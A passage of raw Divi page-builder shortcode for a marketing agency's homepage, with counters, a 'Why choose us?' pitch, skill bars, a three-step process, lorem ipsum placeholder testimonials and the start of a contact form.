number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" 